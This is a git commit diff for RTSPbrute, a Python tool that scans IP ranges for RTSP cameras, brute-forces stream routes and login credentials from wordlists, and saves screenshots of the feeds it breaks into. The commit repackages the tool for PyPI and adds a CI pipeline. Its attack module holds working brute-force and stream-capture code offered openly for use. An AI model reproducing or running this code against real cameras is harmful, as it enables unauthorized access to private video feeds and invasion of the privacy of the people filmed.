Projects STRLCPY RTSPbrute Commits 472dd3dc
🤬
  • ■ ■ ■ ■ ■ ■
    .gitignore
    skipped 4 lines
    5 5   
    6 6  # Project related
    7 7  reports/
    8  -result.txt
    9  -debug.log
    10 8   
    11 9  # Development
    12 10  .vscode/*
    13 11  rtspbrute-env/
    14  -test*
     12 +test/
    15 13   
     14 +# Deploy
     15 +build/
     16 +dist/
     17 +rtspbrute.egg-info/
  • ■ ■ ■ ■ ■ ■
    .gitlab-ci.yml
     1 +image: python:3.7
     2 + 
     3 +stages:
     4 + - build
     5 + - test
     6 + - release
     7 + 
     8 +packaging:
     9 + stage: build
     10 + script:
     11 + - pip install --upgrade setuptools wheel
     12 + - python3 setup.py sdist bdist_wheel
     13 + artifacts:
     14 + paths:
     15 + - dist
     16 + 
     17 +pytest:
     18 + stage: test
     19 + script:
     20 + - pip install dist/*.whl
     21 + - pip install pytest pytest-cov
     22 + - pytest
     23 + - pytest --cov=rtspbrute
     24 + 
     25 +upload:
     26 + stage: release
     27 + only:
     28 + - tags
     29 + script:
     30 + - pip install --upgrade twine
     31 + - twine upload dist/*
     32 + 
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # RTSPBrute
    2 2   
     3 +[![pipeline status](https://gitlab.com/woolf/RTSPbrute/badges/master/pipeline.svg)](https://gitlab.com/woolf/RTSPbrute/-/commits/master)
     4 +[![coverage report](https://gitlab.com/woolf/RTSPbrute/badges/master/coverage.svg)](https://gitlab.com/woolf/RTSPbrute/-/commits/master)
     5 + 
    3 6  <p align="center">
    4  - <a href="https://asciinema.org/a/351052?autoplay=1" target="_blank"><img src="https://asciinema.org/a/351052.svg" /></a>
     7 + <a href="https://asciinema.org/a/353291" target="_blank"><img src="https://asciinema.org/a/353291.svg" /></a>
    5 8  </p>
    6 9   
    7 10  > Inspired by [Cameradar](https://github.com/Ullaakut/cameradar)
    skipped 22 lines
    30 33  - `Pillow`
    31 34  - `rich`
    32 35   
    33  -### Steps to install
     36 +Install with `pip` or your favorite PyPI package manager.
    34 37   
    35  -1. `git clone https://gitlab.com/woolf/RTSPbrute.git`
    36  -2. `cd RTSPbrute`
    37  -3. `pip install -r requirements.txt`
     38 +```
     39 +pip install rtspbrute
     40 +```
    38 41   
    39 42  ## CLI
    40 43   
    41 44  ```
    42 45  USAGE
    43  - $ core.py [-h] [-t TARGETS] [-p PORTS [PORTS ...]] [-r ROUTES] [-c CREDENTIALS]
    44  - [-ct N] [-bt N] [-st N] [-T TIMEOUT] [-d]
     46 + $ rtspbrute -t TARGETS [-p PORTS [PORTS ...]] [-r ROUTES] [-c CREDENTIALS]
     47 + [-ct N] [-bt N] [-st N] [-T TIMEOUT] [-d] [-h]
    45 48   
    46 49  ARGUMENTS
    47 50   -h, --help show this help message and exit
    skipped 8 lines
    56 59   -d, --debug enable the debug logs
    57 60   
    58 61  EXAMPLES
    59  - $ python core.py
    60  - $ python core.py -t ips.txt -p 554 5554
    61  - $ python core.py -r paths.txt -c combinations.txt
    62  - $ python core.py -st 10 -T 10
     62 + $ rtspbrute -h
     63 + $ rtspbrute -t hosts.txt -p 554 5554 8554 -d
     64 + $ rtspbrute -t ips.txt -r routes.txt -c combinations.txt
     65 + $ rtspbrute -t targets.txt -st 10 -T 10
    63 66  ```
    64 67   
    65  -- **"-t, --targets"** (`hosts.txt`): Set custom path to the input file. The file can contain IPs, IP ranges and CIDRs. Each one of them should be on a separate line, e.g.:
     68 +### **"argument"** (`default_value`):
     69 + 
     70 +- **"-t, --targets"** (_No default value_): Set the path to the input file. The file can contain IPs, IP ranges and CIDRs. Each one of them should be on a separate line, e.g.:
    66 71   
    67 72  ```
    68 73  0.0.0.0
    skipped 23 lines
    92 97  - **"-T, --timeout"** (`2`): Set custom timeout value for socket connections
    93 98  - **"-d, --debug"** (`False`): Enable debug logging to `debug.log` file
    94 99   
    95  -## TODO
    96  - 
    97  -- [x] Add support for multiple ports
    98  -- [ ] Optimize for large input
    99  -- [ ] Add tests
    100  -- [x] Add CLI
    101  -- [x] Beautify format of output to terminal
    102  -- [ ] Release on PyPI
    103  - 
  • ■ ■ ■ ■ ■ ■
    config.py
    1  -import time
    2  -from pathlib import Path
    3  -from typing import List
    4  - 
    5  -from modules.cli.output import progress_bar
    6  - 
    7  -ROUTES: List[str]
    8  -CREDENTIALS: List[str]
    9  -PORTS: List[int]
    10  - 
    11  -CHECK_PROGRESS = progress_bar.add_task("[bright_red]Checking...", total=0)
    12  -BRUTE_PROGRESS = progress_bar.add_task("[bright_yellow]Bruting...", total=0)
    13  -SCREENSHOT_PROGRESS = progress_bar.add_task("[bright_green]Screenshoting...", total=0)
    14  - 
    15  -start_datetime = time.strftime("%Y.%m.%d-%H.%M.%S")
    16  -DEBUG_LOG_FILE = Path.cwd() / "debug.log"
    17  -REPORT_FOLDER = Path.cwd() / "reports" / start_datetime
    18  -PICS_FOLDER = REPORT_FOLDER / "pics"
    19  -RESULT_FILE = REPORT_FOLDER / "result.txt"
    20  -HTML_FILE = REPORT_FOLDER / "index.html"
    21  - 
  • ■ ■ ■ ■ ■ ■
    core.py
    1  -import collections
    2  -import logging
    3  -import threading
    4  -from queue import Queue
    5  -from typing import Callable, List
    6  - 
    7  -import av
    8  -from rich.panel import Panel
    9  - 
    10  -import config
    11  -from modules import utils, worker
    12  -from modules.cli.input import parser
    13  -from modules.cli.output import console
    14  -from modules.rtsp import RTSPClient
    15  - 
    16  - 
    17  -def start_threads(number: int, target: Callable, *args) -> List[threading.Thread]:
    18  - debugger.debug(
    19  - f"Starting {number} threads of {target.__module__}.{target.__name__}"
    20  - )
    21  - threads = []
    22  - for _ in range(number):
    23  - thread = threading.Thread(target=target, args=args)
    24  - thread.daemon = True
    25  - threads.append(thread)
    26  - thread.start()
    27  - return threads
    28  - 
    29  - 
    30  -def wait_for(queue: Queue, threads: List[threading.Thread]):
    31  - """Waits for queue and then threads to finish."""
    32  - queue.join()
    33  - [queue.put(None) for _ in range(len(threads))]
    34  - [t.join() for t in threads]
    35  - 
    36  - 
    37  -if __name__ == "__main__":
    38  - args = parser.parse_args()
    39  - 
    40  - # Logging module set up
    41  - debugger = logging.getLogger("debugger")
    42  - debugger.setLevel(logging.DEBUG)
    43  - if args.debug:
    44  - file_handler = logging.FileHandler(config.DEBUG_LOG_FILE, "w")
    45  - file_handler.setFormatter(
    46  - logging.Formatter(
    47  - "[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(funcName)s] %(message)s"
    48  - )
    49  - )
    50  - debugger.addHandler(file_handler)
    51  - else:
    52  - debugger.addHandler(logging.NullHandler())
    53  - debugger.propagate = False
    54  - 
    55  - # Redirect PyAV logs only to file
    56  - libav_logger = logging.getLogger("libav")
    57  - libav_logger.setLevel(logging.DEBUG)
    58  - if args.debug:
    59  - libav_logger.addHandler(file_handler)
    60  - libav_logger.propagate = False
    61  - av_logger = logging.getLogger("av")
    62  - av_logger.setLevel(logging.DEBUG)
    63  - if args.debug:
    64  - av_logger.addHandler(file_handler)
    65  - av_logger.propagate = False
    66  - # This disables ValueError from av module printing to console, but this also
    67  - # means we won't get any logs from av, if they aren't FATAL or PANIC level.
    68  - av.logging.set_level(av.logging.FATAL)
    69  - 
    70  - targets = collections.deque(set(utils.load_txt(args.targets, "targets")))
    71  - config.ROUTES = utils.load_txt(args.routes, "routes")
    72  - config.CREDENTIALS = utils.load_txt(args.credentials, "credentials")
    73  - 
    74  - config.PORTS = args.ports
    75  - 
    76  - utils.create_folder(config.PICS_FOLDER)
    77  - utils.create_file(config.RESULT_FILE)
    78  - utils.generate_html(config.HTML_FILE)
    79  - 
    80  - check_queue = Queue()
    81  - brute_queue = Queue()
    82  - screenshot_queue = Queue()
    83  - 
    84  - check_threads = start_threads(
    85  - args.check_threads, worker.brute_routes, check_queue, brute_queue
    86  - )
    87  - brute_threads = start_threads(
    88  - args.brute_threads, worker.brute_credentials, brute_queue, screenshot_queue
    89  - )
    90  - screenshot_threads = start_threads(
    91  - args.screenshot_threads, worker.screenshot_targets, screenshot_queue
    92  - )
    93  - 
    94  - console.print("[green]Starting...\n")
    95  - 
    96  - config.progress_bar.update(config.CHECK_PROGRESS, total=len(targets))
    97  - config.progress_bar.start()
    98  - while targets:
    99  - check_queue.put(RTSPClient(ip=targets.popleft(), timeout=args.timeout))
    100  - 
    101  - wait_for(check_queue, check_threads)
    102  - debugger.debug("Check queue and threads finished")
    103  - wait_for(brute_queue, brute_threads)
    104  - debugger.debug("Brute queue and threads finished")
    105  - wait_for(screenshot_queue, screenshot_threads)
    106  - debugger.debug("Screenshot queue and threads finished")
    107  - 
    108  - config.progress_bar.stop()
    109  - 
    110  - print()
    111  - if args.debug:
    112  - file_handler.close()
    113  - config.DEBUG_LOG_FILE.rename(config.REPORT_FOLDER / config.DEBUG_LOG_FILE.name)
    114  - screenshots = list(config.PICS_FOLDER.iterdir())
    115  - console.print(f"[green]Saved {len(screenshots)} screenshots")
    116  - console.print(
    117  - Panel(
    118  - f"[bright_green]{str(config.REPORT_FOLDER)}", title="Report", expand=False
    119  - ),
    120  - justify="center",
    121  - )
    122  - 
  • hosts.txt
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    modules/attack.py
    1  -import logging
    2  -import sys
    3  - 
    4  -import av
    5  - 
    6  -import config
    7  -from modules import utils
    8  -from modules.cli.output import console
    9  -from modules.rtsp import RTSPClient, Status
    10  - 
    11  -sys.path.append("..")
    12  - 
    13  -dummy_route = "/0x8b6c42"
    14  -logger = logging.getLogger("debugger")
    15  - 
    16  - 
    17  -def attack(target: RTSPClient, port=None, route=None, credentials=None):
    18  - if port is None:
    19  - port = target.port
    20  - if route is None:
    21  - route = target.route
    22  - if credentials is None:
    23  - credentials = target.credentials
    24  - 
    25  - # Create socket connection.
    26  - ok = target.connect(port)
    27  - if not ok:
    28  - if target.status is Status.UNIDENTIFIED:
    29  - logger.debug(
    30  - f"Failed to connect {str(target)}:", exc_info=target.last_error
    31  - )
    32  - else:
    33  - logger.debug(f"Failed to connect {str(target)}: {target.status.name}")
    34  - return False
    35  - 
    36  - attack_url = RTSPClient.get_rtsp_url(target.ip, port, credentials, route)
    37  - # Try to authorize: create describe packet and send it.
    38  - ok = target.authorize(port, route, credentials)
    39  - request = "\n\t".join(target.packet.split("\r\n")).rstrip()
    40  - if target.data:
    41  - response = "\n\t".join(target.data.split("\r\n")).rstrip()
    42  - else:
    43  - response = ""
    44  - logger.debug(f"\nSent:\n\t{request}\nReceived:\n\t{response}")
    45  - if not ok:
    46  - logger.debug(f"Failed to authorize {attack_url}", exc_info=target.last_error)
    47  - return False
    48  - 
    49  - return True
    50  - 
    51  - 
    52  -def attack_route(target: RTSPClient):
    53  - # If it's a 401 or 403, it means that the credentials are wrong but the route might be okay.
    54  - # If it's a 200, the stream is accessed successfully.
    55  - ok_codes = ["200", "401", "403"]
    56  - 
    57  - # If the stream responds positively to the dummy route, it means
    58  - # it doesn't require (or respect the RFC) a route and the attack
    59  - # can be skipped.
    60  - for port in config.PORTS:
    61  - ok = attack(target, port=port, route=dummy_route)
    62  - if ok and any(code in target.data for code in ok_codes):
    63  - target.port = port
    64  - target.routes.append("/")
    65  - return target
    66  - 
    67  - # Otherwise, bruteforce the routes.
    68  - for route in config.ROUTES:
    69  - ok = attack(target, port=port, route=route)
    70  - if not ok:
    71  - break
    72  - if any(code in target.data for code in ok_codes):
    73  - target.port = port
    74  - target.routes.append(route)
    75  - return target
    76  - 
    77  - 
    78  -def attack_credentials(target: RTSPClient):
    79  - def _log_working_stream():
    80  - console.print("Working stream at", target)
    81  - logger.debug(
    82  - f"Working stream at {str(target)} with {target.auth_method.name} auth"
    83  - )
    84  - 
    85  - if target.is_authorized:
    86  - _log_working_stream()
    87  - return target
    88  - 
    89  - # If it's a 404, it means that the route is incorrect but the credentials might be okay.
    90  - # If it's a 200, the stream is accessed successfully.
    91  - ok_codes = ["200", "404"]
    92  - 
    93  - # If stream responds positively to no credentials, it means
    94  - # it doesn't require them and the attack can be skipped.
    95  - ok = attack(target, credentials=":")
    96  - if ok and any(code in target.data for code in ok_codes):
    97  - _log_working_stream()
    98  - return target
    99  - 
    100  - # Otherwise, bruteforce the routes.
    101  - for cred in config.CREDENTIALS:
    102  - ok = attack(target, credentials=cred)
    103  - if not ok:
    104  - return False
    105  - if any(code in target.data for code in ok_codes):
    106  - target.credentials = cred
    107  - _log_working_stream()
    108  - return target
    109  - 
    110  - 
    111  -def get_screenshot(target: RTSPClient, tries=0):
    112  - file_name = utils.escape_chars(f"{str(target).lstrip('rtsp://')}.jpg")
    113  - file_path = config.PICS_FOLDER / file_name
    114  - 
    115  - try:
    116  - with av.open(
    117  - str(target),
    118  - options={
    119  - "rtsp_transport": "tcp",
    120  - "rtsp_flags": "prefer_tcp",
    121  - "stimeout": "3000000",
    122  - },
    123  - timeout=60.0,
    124  - ) as video:
    125  - if (
    126  - video.streams.video[0].profile is None
    127  - and video.streams.video[0].start_time is None
    128  - and video.streams.video[0].codec_context.format is None
    129  - ):
    130  - # There's a high possibility that this video stream is broken
    131  - # or something else, so we try again just to make sure
    132  - if tries == 2:
    133  - video.close()
    134  - tries += 1
    135  - return get_screenshot(target, tries)
    136  - else:
    137  - logger.debug(
    138  - f"Broken video stream or unknown issues with {str(target)}"
    139  - )
    140  - return
    141  - video.streams.video[0].thread_type = "AUTO"
    142  - for frame in video.decode(video=0):
    143  - frame.to_image().save(file_path)
    144  - break
    145  - except (MemoryError, PermissionError, av.InvalidDataError) as e:
    146  - # Those errors occurs when there's too much SCREENSHOT_THREADS.
    147  - logger.debug(f"Missed screenshot of {str(target)}: {repr(e)}")
    148  - # Try one more time in hope for luck.
    149  - if tries == 2:
    150  - tries += 1
    151  - console.print("[yellow]Retry to get a screenshot of the", target)
    152  - return get_screenshot(target, tries)
    153  - else:
    154  - console.print(
    155  - f"[italic red]Missed screenshot of [underline]{str(target)}[/underline] - if you see this message a lot, consider reducing the number of screenshot threads",
    156  - )
    157  - return
    158  - except Exception as e:
    159  - logger.debug(f"get_screenshot failed with {str(target)}: {repr(e)}")
    160  - return
    161  - 
    162  - console.print("[bold]Captured screenshot for", target)
    163  - logger.debug(f"Captured screenshot for {str(target)}")
    164  - return file_path
    165  - 
  • ■ ■ ■ ■ ■ ■
    modules/worker.py
    1  -import sys
    2  -from queue import Queue
    3  -from threading import Lock
    4  - 
    5  -import config
    6  - 
    7  -from .attack import attack_credentials, attack_route, get_screenshot
    8  -from .rtsp import RTSPClient
    9  -from .utils import append_result
    10  - 
    11  -sys.path.append("..")
    12  - 
    13  - 
    14  -GLOBAL_LOCK = Lock()
    15  - 
    16  - 
    17  -def brute_routes(input_queue: Queue, output_queue: Queue) -> None:
    18  - while True:
    19  - target: RTSPClient = input_queue.get()
    20  - if target is None:
    21  - break
    22  - 
    23  - result = attack_route(target)
    24  - if result:
    25  - config.progress_bar.add_total(config.BRUTE_PROGRESS)
    26  - output_queue.put(result)
    27  - 
    28  - config.progress_bar.update(config.CHECK_PROGRESS, advance=1)
    29  - input_queue.task_done()
    30  - 
    31  - 
    32  -def brute_credentials(input_queue: Queue, output_queue: Queue) -> None:
    33  - while True:
    34  - target: RTSPClient = input_queue.get()
    35  - if target is None:
    36  - break
    37  - 
    38  - result = attack_credentials(target)
    39  - if result:
    40  - config.progress_bar.add_total(config.SCREENSHOT_PROGRESS)
    41  - output_queue.put(target)
    42  - 
    43  - config.progress_bar.update(config.BRUTE_PROGRESS, advance=1)
    44  - input_queue.task_done()
    45  - 
    46  - 
    47  -def screenshot_targets(input_queue: Queue) -> None:
    48  - while True:
    49  - target: RTSPClient = input_queue.get()
    50  - if target is None:
    51  - break
    52  - 
    53  - image = get_screenshot(target)
    54  - if image:
    55  - append_result(
    56  - GLOBAL_LOCK, config.RESULT_FILE, config.HTML_FILE, image, target
    57  - )
    58  - 
    59  - config.progress_bar.update(config.SCREENSHOT_PROGRESS, advance=1)
    60  - input_queue.task_done()
    61  - 
  • ■ ■ ■ ■ ■ ■
    requirements.txt
    1  -colorama
    2  -Pillow
    3  -rich
     1 +av==8.0.2
     2 +Pillow==7.2.0
     3 +rich==5.1.2
  • ■ ■ ■ ■ ■ ■
    rtspbrute/__init__.py
     1 +from pathlib import Path
     2 + 
     3 +__version__ = "1.0.0"
     4 +DEFAULT_ROUTES = Path(__file__).parent / "routes.txt"
     5 +DEFAULT_CREDENTIALS = Path(__file__).parent / "credentials.txt"
     6 + 
  • ■ ■ ■ ■ ■ ■
    rtspbrute/__main__.py
     1 +import collections
     2 +import logging
     3 +import threading
     4 +import time
     5 +from pathlib import Path
     6 +from queue import Queue
     7 +from typing import Callable, List
     8 + 
     9 +import av
     10 +from rich.panel import Panel
     11 + 
     12 +from rtspbrute.modules import attack, utils, worker
     13 +from rtspbrute.modules.cli.input import parser
     14 +from rtspbrute.modules.cli.output import console, progress_bar
     15 +from rtspbrute.modules.rtsp import RTSPClient
     16 + 
     17 + 
     18 +def start_threads(number: int, target: Callable, *args) -> List[threading.Thread]:
     19 + threads = []
     20 + for _ in range(number):
     21 + thread = threading.Thread(target=target, args=args)
     22 + thread.daemon = True
     23 + threads.append(thread)
     24 + thread.start()
     25 + return threads
     26 + 
     27 + 
     28 +def wait_for(queue: Queue, threads: List[threading.Thread]):
     29 + """Waits for queue and then threads to finish."""
     30 + queue.join()
     31 + [queue.put(None) for _ in range(len(threads))]
     32 + [t.join() for t in threads]
     33 + 
     34 + 
     35 +def main():
     36 + args = parser.parse_args()
     37 + 
     38 + # Folders and files set up
     39 + start_datetime = time.strftime("%Y.%m.%d-%H.%M.%S")
     40 + REPORT_FOLDER = Path.cwd() / "reports" / start_datetime
     41 + attack.PICS_FOLDER = REPORT_FOLDER / "pics"
     42 + utils.RESULT_FILE = REPORT_FOLDER / "result.txt"
     43 + utils.HTML_FILE = REPORT_FOLDER / "index.html"
     44 + utils.create_folder(attack.PICS_FOLDER)
     45 + utils.create_file(utils.RESULT_FILE)
     46 + utils.generate_html(utils.HTML_FILE)
     47 + 
     48 + # Logging module set up
     49 + logger = logging.getLogger()
     50 + attack.logger_is_enabled = args.debug
     51 + if args.debug:
     52 + logger.setLevel(logging.DEBUG)
     53 + file_handler = logging.FileHandler(REPORT_FOLDER / "debug.log")
     54 + file_handler.setFormatter(
     55 + logging.Formatter(
     56 + "[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(funcName)s] %(message)s"
     57 + )
     58 + )
     59 + logger.addHandler(file_handler)
     60 + # This disables ValueError from av module printing to console, but this also
     61 + # means we won't get any logs from av, if they aren't FATAL or PANIC level.
     62 + av.logging.set_level(av.logging.FATAL)
     63 + 
     64 + # Progress output set up
     65 + worker.PROGRESS_BAR = progress_bar
     66 + worker.CHECK_PROGRESS = progress_bar.add_task("[bright_red]Checking...", total=0)
     67 + worker.BRUTE_PROGRESS = progress_bar.add_task("[bright_yellow]Bruting...", total=0)
     68 + worker.SCREENSHOT_PROGRESS = progress_bar.add_task(
     69 + "[bright_green]Screenshoting...", total=0
     70 + )
     71 + 
     72 + # Targets, routes, credentials and ports set up
     73 + targets = collections.deque(set(utils.load_txt(args.targets, "targets")))
     74 + attack.ROUTES = utils.load_txt(args.routes, "routes")
     75 + attack.CREDENTIALS = utils.load_txt(args.credentials, "credentials")
     76 + attack.PORTS = args.ports
     77 + 
     78 + check_queue = Queue()
     79 + brute_queue = Queue()
     80 + screenshot_queue = Queue()
     81 + 
     82 + if args.debug:
     83 + logger.debug(f"Starting {args.check_threads} threads of worker.brute_routes")
     84 + check_threads = start_threads(
     85 + args.check_threads, worker.brute_routes, check_queue, brute_queue
     86 + )
     87 + if args.debug:
     88 + logger.debug(
     89 + f"Starting {args.brute_threads} threads of worker.brute_credentials"
     90 + )
     91 + brute_threads = start_threads(
     92 + args.brute_threads, worker.brute_credentials, brute_queue, screenshot_queue
     93 + )
     94 + if args.debug:
     95 + logger.debug(
     96 + f"Starting {args.screenshot_threads} threads of worker.screenshot_targets"
     97 + )
     98 + screenshot_threads = start_threads(
     99 + args.screenshot_threads, worker.screenshot_targets, screenshot_queue
     100 + )
     101 + 
     102 + console.print("[green]Starting...\n")
     103 + 
     104 + progress_bar.update(worker.CHECK_PROGRESS, total=len(targets))
     105 + progress_bar.start()
     106 + while targets:
     107 + check_queue.put(RTSPClient(ip=targets.popleft(), timeout=args.timeout))
     108 + 
     109 + wait_for(check_queue, check_threads)
     110 + if args.debug:
     111 + logger.debug("Check queue and threads finished")
     112 + wait_for(brute_queue, brute_threads)
     113 + if args.debug:
     114 + logger.debug("Brute queue and threads finished")
     115 + wait_for(screenshot_queue, screenshot_threads)
     116 + if args.debug:
     117 + logger.debug("Screenshot queue and threads finished")
     118 + 
     119 + progress_bar.stop()
     120 + 
     121 + print()
     122 + screenshots = list(attack.PICS_FOLDER.iterdir())
     123 + console.print(f"[green]Saved {len(screenshots)} screenshots")
     124 + console.print(
     125 + Panel(f"[bright_green]{str(REPORT_FOLDER)}", title="Report", expand=False),
     126 + justify="center",
     127 + )
     128 + 
     129 + 
     130 +if __name__ == "__main__":
     131 + main()
     132 + 
  • credentials.txt rtspbrute/credentials.txt
    Content is identical
  • modules/__init__.py rtspbrute/modules/__init__.py
    Content is identical
  • ■ ■ ■ ■ ■ ■
    rtspbrute/modules/attack.py
     1 +import logging
     2 +from pathlib import Path
     3 +from typing import List
     4 + 
     5 +import av
     6 + 
     7 +from rtspbrute.modules.cli.output import console
     8 +from rtspbrute.modules.rtsp import RTSPClient, Status
     9 +from rtspbrute.modules.utils import escape_chars
     10 + 
     11 +ROUTES: List[str]
     12 +CREDENTIALS: List[str]
     13 +PORTS: List[int]
     14 +PICS_FOLDER: Path
     15 + 
     16 +DUMMY_ROUTE = "/0x8b6c42"
     17 +MAX_SCREENSHOT_TRIES = 2
     18 + 
     19 +logger = logging.getLogger()
     20 +logger_is_enabled = logger.isEnabledFor(logging.DEBUG)
     21 + 
     22 + 
     23 +def attack(target: RTSPClient, port=None, route=None, credentials=None):
     24 + if port is None:
     25 + port = target.port
     26 + if route is None:
     27 + route = target.route
     28 + if credentials is None:
     29 + credentials = target.credentials
     30 + 
     31 + # Create socket connection.
     32 + connected = target.connect(port)
     33 + if not connected:
     34 + if logger_is_enabled:
     35 + if target.status is Status.UNIDENTIFIED:
     36 + logger.debug(f"Failed to connect {target}:", exc_info=target.last_error)
     37 + else:
     38 + logger.debug(f"Failed to connect {target}: {target.status.name}")
     39 + return False
     40 + 
     41 + # Try to authorize: create describe packet and send it.
     42 + authorized = target.authorize(port, route, credentials)
     43 + if logger_is_enabled:
     44 + request = "\n\t".join(target.packet.split("\r\n")).rstrip()
     45 + if target.data:
     46 + response = "\n\t".join(target.data.split("\r\n")).rstrip()
     47 + else:
     48 + response = ""
     49 + logger.debug(f"\nSent:\n\t{request}\nReceived:\n\t{response}")
     50 + if not authorized:
     51 + if logger_is_enabled:
     52 + attack_url = RTSPClient.get_rtsp_url(target.ip, port, credentials, route)
     53 + logger.debug(
     54 + f"Failed to authorize {attack_url}", exc_info=target.last_error
     55 + )
     56 + return False
     57 + 
     58 + return True
     59 + 
     60 + 
     61 +def attack_route(target: RTSPClient):
     62 + # If it's a 401 or 403, it means that the credentials are wrong but the route might be okay.
     63 + # If it's a 200, the stream is accessed successfully.
     64 + ok_codes = ["200", "401", "403"]
     65 + 
     66 + # If the stream responds positively to the dummy route, it means
     67 + # it doesn't require (or respect the RFC) a route and the attack
     68 + # can be skipped.
     69 + for port in PORTS:
     70 + ok = attack(target, port=port, route=DUMMY_ROUTE)
     71 + if ok and any(code in target.data for code in ok_codes):
     72 + target.port = port
     73 + target.routes.append("/")
     74 + return target
     75 + 
     76 + # Otherwise, bruteforce the routes.
     77 + for route in ROUTES:
     78 + ok = attack(target, port=port, route=route)
     79 + if not ok:
     80 + break
     81 + if any(code in target.data for code in ok_codes):
     82 + target.port = port
     83 + target.routes.append(route)
     84 + return target
     85 + 
     86 + 
     87 +def attack_credentials(target: RTSPClient):
     88 + def _log_working_stream():
     89 + console.print("Working stream at", target)
     90 + if logger_is_enabled:
     91 + logger.debug(
     92 + f"Working stream at {target} with {target.auth_method.name} auth"
     93 + )
     94 + 
     95 + if target.is_authorized:
     96 + _log_working_stream()
     97 + return target
     98 + 
     99 + # If it's a 404, it means that the route is incorrect but the credentials might be okay.
     100 + # If it's a 200, the stream is accessed successfully.
     101 + ok_codes = ["200", "404"]
     102 + 
     103 + # If stream responds positively to no credentials, it means
     104 + # it doesn't require them and the attack can be skipped.
     105 + ok = attack(target, credentials=":")
     106 + if ok and any(code in target.data for code in ok_codes):
     107 + _log_working_stream()
     108 + return target
     109 + 
     110 + # Otherwise, bruteforce the routes.
     111 + for cred in CREDENTIALS:
     112 + ok = attack(target, credentials=cred)
     113 + if not ok:
     114 + break
     115 + if any(code in target.data for code in ok_codes):
     116 + target.credentials = cred
     117 + _log_working_stream()
     118 + return target
     119 + 
     120 + 
     121 +def _is_video_stream(stream):
     122 + return (
     123 + stream.profile is not None
     124 + and stream.start_time is not None
     125 + and stream.codec_context.format is not None
     126 + )
     127 + 
     128 + 
     129 +def get_screenshot(rtsp_url: str, tries=1):
     130 + try:
     131 + with av.open(
     132 + rtsp_url,
     133 + options={
     134 + "rtsp_transport": "tcp",
     135 + "rtsp_flags": "prefer_tcp",
     136 + "stimeout": "3000000",
     137 + },
     138 + timeout=60.0,
     139 + ) as container:
     140 + stream = container.streams.video[0]
     141 + if _is_video_stream(stream):
     142 + file_name = escape_chars(f"{rtsp_url.lstrip('rtsp://')}.jpg")
     143 + file_path = PICS_FOLDER / file_name
     144 + stream.thread_type = "AUTO"
     145 + for frame in container.decode(video=0):
     146 + frame.to_image().save(file_path)
     147 + break
     148 + console.print(
     149 + f"[bold]Captured screenshot for", f"[underline cyan]{rtsp_url}",
     150 + )
     151 + if logger_is_enabled:
     152 + logger.debug(f"Captured screenshot for {rtsp_url}")
     153 + return file_path
     154 + else:
     155 + # There's a high possibility that this video stream is broken
     156 + # or something else, so we try again just to make sure.
     157 + if tries < MAX_SCREENSHOT_TRIES:
     158 + container.close()
     159 + tries += 1
     160 + return get_screenshot(rtsp_url, tries)
     161 + else:
     162 + if logger_is_enabled:
     163 + logger.debug(
     164 + f"Broken video stream or unknown issues with {rtsp_url}"
     165 + )
     166 + return
     167 + except (MemoryError, PermissionError, av.InvalidDataError) as e:
     168 + # These errors occur when there's too much SCREENSHOT_THREADS.
     169 + if logger_is_enabled:
     170 + logger.debug(f"Missed screenshot of {rtsp_url}: {repr(e)}")
     171 + # Try one more time in hope for luck.
     172 + if tries < MAX_SCREENSHOT_TRIES:
     173 + tries += 1
     174 + console.print(
     175 + f"[yellow]Retry to get a screenshot of the [underline]{rtsp_url}"
     176 + )
     177 + return get_screenshot(rtsp_url, tries)
     178 + else:
     179 + console.print(
     180 + f"[italic red]Missed screenshot of [underline]{rtsp_url}[/underline] - if you see this message a lot, consider reducing the number of screenshot threads",
     181 + )
     182 + return
     183 + except Exception as e:
     184 + if logger_is_enabled:
     185 + logger.debug(f"get_screenshot failed with {rtsp_url}: {repr(e)}")
     186 + return
     187 + 
  • ■ ■ ■ ■ ■
    rtspbrute/modules/cli/__init__.py
     1 + 
  • ■ ■ ■ ■ ■
    modules/cli/input.py rtspbrute/modules/cli/input.py
    1 1  import argparse
     2 +from pathlib import Path
     3 +from typing import Any
     4 + 
     5 +from rtspbrute import DEFAULT_CREDENTIALS, DEFAULT_ROUTES, __version__
    2 6   
    3 7   
    4 8  class CustomHelpFormatter(argparse.HelpFormatter):
    skipped 8 lines
    13 17   return ", ".join(action.option_strings) + " " + args_string
    14 18   
    15 19   
     20 +def file_path(value: Any):
     21 + if Path(value).exists():
     22 + return Path(value)
     23 + else:
     24 + raise argparse.ArgumentTypeError(f"{value} is not a valid path")
     25 + 
     26 + 
     27 +def port(value: Any):
     28 + if int(value) in range(65536):
     29 + return int(value)
     30 + else:
     31 + raise argparse.ArgumentTypeError(f"{value} is not a valid port")
     32 + 
     33 + 
    16 34  fmt = lambda prog: CustomHelpFormatter(prog)
    17 35  parser = argparse.ArgumentParser(
     36 + prog="rtspbrute",
    18 37   description="Tool for RTSP that brute-forces routes and credentials, makes screenshots!",
    19 38   formatter_class=fmt,
    20 39  )
    21 40  parser.add_argument(
    22 41   "-t",
    23 42   "--targets",
    24  - default="hosts.txt",
     43 + type=file_path,
     44 + required=True,
    25 45   help="the targets on which to scan for open RTSP streams",
    26 46  )
    27 47  parser.add_argument(
    skipped 1 lines
    29 49   "--ports",
    30 50   nargs="+",
    31 51   default=[554],
    32  - type=int,
     52 + type=port,
    33 53   help="the ports on which to search for RTSP streams",
    34 54  )
    35 55  parser.add_argument(
    36 56   "-r",
    37 57   "--routes",
    38  - default="routes.txt",
     58 + type=file_path,
     59 + default=DEFAULT_ROUTES,
    39 60   help="the path on which to load a custom routes",
    40 61  )
    41 62  parser.add_argument(
    42 63   "-c",
    43 64   "--credentials",
    44  - default="credentials.txt",
     65 + type=file_path,
     66 + default=DEFAULT_CREDENTIALS,
    45 67   help="the path on which to load a custom credentials",
    46 68  )
    47 69  parser.add_argument(
    skipped 24 lines
    72 94   "-T", "--timeout", default=2, type=int, help="the timeout to use for sockets"
    73 95  )
    74 96  parser.add_argument("-d", "--debug", action="store_true", help="enable the debug logs")
     97 +parser.add_argument("--version", action="version", version=f"%(prog)s {__version__}")
    75 98   
  • ■ ■ ■ ■
    modules/cli/output.py rtspbrute/modules/cli/output.py
    skipped 2 lines
    3 3   
    4 4   
    5 5  class ProgressBar(Progress):
    6  - def __init__(self, console: Console) -> None:
     6 + def __init__(self, console: Console = Console()) -> None:
    7 7   super().__init__(
    8 8   "[progress.description]{task.description}",
